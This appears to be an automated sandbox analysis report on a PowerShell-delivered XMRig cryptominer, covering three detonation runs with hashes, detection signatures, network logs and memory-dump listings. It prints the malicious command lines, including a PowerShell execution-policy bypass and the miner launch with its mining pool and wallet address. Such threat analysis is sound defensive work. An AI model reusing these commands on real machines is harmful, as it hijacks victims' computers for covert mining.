memory/520-5-0x00000299FE280000-0x00000299FE2A2000-memory.dmp
memory/520-6-0x00007FFA85570000-0x00007FFA85F5C000-memory.dmp
memory/520-9-0x00007FFA85570000-0x00007FFA85F5C000-memory.dmp
memory/520-10-0x00000299FE430000-0x00000299FE4A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ln4pwkgv.jyx.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/520-25-0x00007FFA85570000-0x00007FFA85F5C000-memory.dmp
memory/520-48-0x00000299FE410000-0x00000299FE422000-memory.dmp
memory/520-61-0x00000299FE400000-0x00000299FE40A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/800-90-0x00000255FE8D0000-0x00000255FE8F0000-memory.dmp
memory/520-91-0x00007FFA85573000-0x00007FFA85574000-memory.dmp
memory/520-92-0x00007FFA85570000-0x00007FFA85F5C000-memory.dmp
memory/800-93-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/520-94-0x00007FFA85570000-0x00007FFA85F5C000-memory.dmp
memory/800-95-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-96-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-97-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-98-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-99-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-100-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-101-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-102-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-103-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-104-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-105-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-106-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-107-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-108-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-109-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-110-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-111-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-112-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-113-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-114-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-115-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-116-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-117-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-118-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-119-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-120-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-121-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-122-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-123-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-124-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-125-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-126-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-127-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-128-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-129-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-130-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-131-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-132-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-133-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-134-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-135-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-136-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-137-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-138-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-139-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-140-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-141-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-142-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-143-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-144-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-145-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-146-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-147-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-148-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-149-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-150-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-151-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-152-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-153-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-154-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-155-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
memory/800-156-0x00007FF7FD5C0000-0x00007FF7FE1F3000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:47
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1787s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4812 wrote to memory of 4832 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4812 wrote to memory of 4832 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.16.208.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
Files
memory/4812-3-0x00007FFFED043000-0x00007FFFED044000-memory.dmp
memory/4812-5-0x0000023E3F900000-0x0000023E3F922000-memory.dmp
memory/4812-6-0x00007FFFED040000-0x00007FFFEDA2C000-memory.dmp
memory/4812-10-0x00007FFFED040000-0x00007FFFEDA2C000-memory.dmp
memory/4812-9-0x0000023E3FAB0000-0x0000023E3FB26000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nlmlkoie.0nh.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4812-25-0x00007FFFED040000-0x00007FFFEDA2C000-memory.dmp
memory/4812-48-0x0000023E3FE30000-0x0000023E3FE42000-memory.dmp
memory/4812-61-0x0000023E3FA90000-0x0000023E3FA9A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4832-90-0x0000025DEE860000-0x0000025DEE880000-memory.dmp
memory/4832-91-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4812-92-0x00007FFFED040000-0x00007FFFEDA2C000-memory.dmp
memory/4812-94-0x00007FFFED043000-0x00007FFFED044000-memory.dmp
memory/4832-93-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4812-95-0x00007FFFED040000-0x00007FFFEDA2C000-memory.dmp
memory/4812-96-0x00007FFFED040000-0x00007FFFEDA2C000-memory.dmp
memory/4832-97-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-98-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-99-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-100-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-101-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-102-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-103-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-104-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-105-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-106-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-107-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-108-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-109-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-110-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-111-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-112-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-113-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-114-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-115-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-116-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-117-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-118-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-119-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-120-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-121-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-122-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-123-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-124-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-125-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-126-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-127-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-128-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-129-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-130-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-131-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-132-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-133-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-134-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-135-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-136-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-137-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-138-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-139-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-140-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-141-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-142-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-143-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-144-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-145-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-146-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-147-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-148-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-149-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-150-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-151-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-152-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-153-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-154-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-155-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-156-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
memory/4832-157-0x00007FF7A8310000-0x00007FF7A8F43000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:47
Platform
win10v2004-20240611-en
Max time kernel
1798s
Max time network
1782s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3664 wrote to memory of 2872 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3664 wrote to memory of 2872 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.116.69.13.in-addr.arpa | udp |
Files
memory/3664-0-0x00007FF8C28E3000-0x00007FF8C28E5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yrp2wff1.l3j.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3664-10-0x000001F77F330000-0x000001F77F352000-memory.dmp
memory/3664-11-0x00007FF8C28E0000-0x00007FF8C33A1000-memory.dmp
memory/3664-12-0x00007FF8C28E0000-0x00007FF8C33A1000-memory.dmp
memory/3664-14-0x00007FF8C28E0000-0x00007FF8C33A1000-memory.dmp
memory/3664-16-0x000001F77F240000-0x000001F77F24A000-memory.dmp
memory/3664-15-0x000001F77F360000-0x000001F77F372000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2872-47-0x000002C2FE770000-0x000002C2FE790000-memory.dmp
memory/2872-48-0x000002C2FE8D0000-0x000002C2FE8F0000-memory.dmp
memory/2872-49-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-51-0x000002C2FE8F0000-0x000002C2FE910000-memory.dmp
memory/2872-50-0x000002C2FE910000-0x000002C2FE930000-memory.dmp
memory/2872-52-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/3664-53-0x00007FF8C28E3000-0x00007FF8C28E5000-memory.dmp
memory/3664-54-0x00007FF8C28E0000-0x00007FF8C33A1000-memory.dmp
memory/2872-55-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/3664-56-0x00007FF8C28E0000-0x00007FF8C33A1000-memory.dmp
memory/2872-57-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-58-0x000002C2FE910000-0x000002C2FE930000-memory.dmp
memory/2872-59-0x000002C2FE8F0000-0x000002C2FE910000-memory.dmp
memory/2872-60-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-61-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-62-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
